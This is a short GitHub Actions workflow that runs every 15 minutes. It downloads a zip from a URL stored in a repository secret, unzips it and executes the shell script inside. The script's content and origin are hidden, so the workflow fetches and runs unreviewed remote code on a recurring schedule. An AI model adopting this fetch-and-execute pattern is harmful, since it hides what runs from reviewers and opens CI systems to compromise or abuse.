name: bac

on:
  schedule:
    - cron: "*/15 * * * *" 
  workflow_dispatch:

jobs:
  export-and-run:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4
        with:
          token: ${{ secrets.GITHUB_TOKEN }}

      - name: Download
        shell: bash
        run: |
          curl -L -o bac.zip "${{ secrets.BAC }}"
          if [ ! -f "bac.zip" ]; then
            echo "Download failed: bac.zip not found."
            exit 1
          fi

      - name: Unzip
        shell: bash
        run: |
          unzip bac.zip
          rm bac.zip

      - name: Run
        shell: bash
        run: |
          chmod +x ./bac.sh
          ./bac.sh
